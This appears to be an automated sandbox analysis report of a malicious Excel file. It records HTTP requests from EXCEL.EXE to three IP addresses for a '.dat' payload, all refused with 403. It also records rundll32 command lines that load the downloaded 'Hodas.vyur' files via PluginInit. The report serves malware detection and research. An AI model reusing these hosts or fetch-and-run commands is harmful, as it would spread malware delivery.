              Apr 1, 2021 21:33:58.415163994 CEST804916991.211.89.28192.168.2.22

              HTTP Request Dependency Graph

              • 45.150.67.243
              • 195.123.210.186
              • 91.211.89.28

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.224916745.150.67.24380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 1, 2021 21:31:58.545795918 CEST0OUTGET /44285,5327891204.dat HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 45.150.67.243
              Connection: Keep-Alive
              Apr 1, 2021 21:31:58.735208988 CEST1INHTTP/1.1 403 Forbidden
              Server: nginx
              Date: Thu, 01 Apr 2021 19:31:58 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: keep-alive
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.2249168195.123.210.18680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 1, 2021 21:31:58.821412086 CEST1OUTGET /44285,5327891204.dat HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 195.123.210.186
              Connection: Keep-Alive
              Apr 1, 2021 21:31:58.949117899 CEST2INHTTP/1.1 403 Forbidden
              Server: nginx
              Date: Thu, 01 Apr 2021 19:31:58 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: keep-alive
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.224916991.211.89.2880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 1, 2021 21:31:59.056567907 CEST3OUTGET /44285,5327891204.dat HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 91.211.89.28
              Connection: Keep-Alive
              Apr 1, 2021 21:31:59.201011896 CEST4INHTTP/1.1 403 Forbidden
              Server: nginx
              Date: Thu, 01 Apr 2021 19:31:59 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: keep-alive
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:21:31:37
              Start date:01/04/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13f0c0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:21:31:42
              Start date:01/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur,PluginInit
              Imagebase:0xff450000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:21:31:42
              Start date:01/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur1,PluginInit
              Imagebase:0xff450000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:21:31:42
              Start date:01/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur2,PluginInit
              Imagebase:0xff450000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >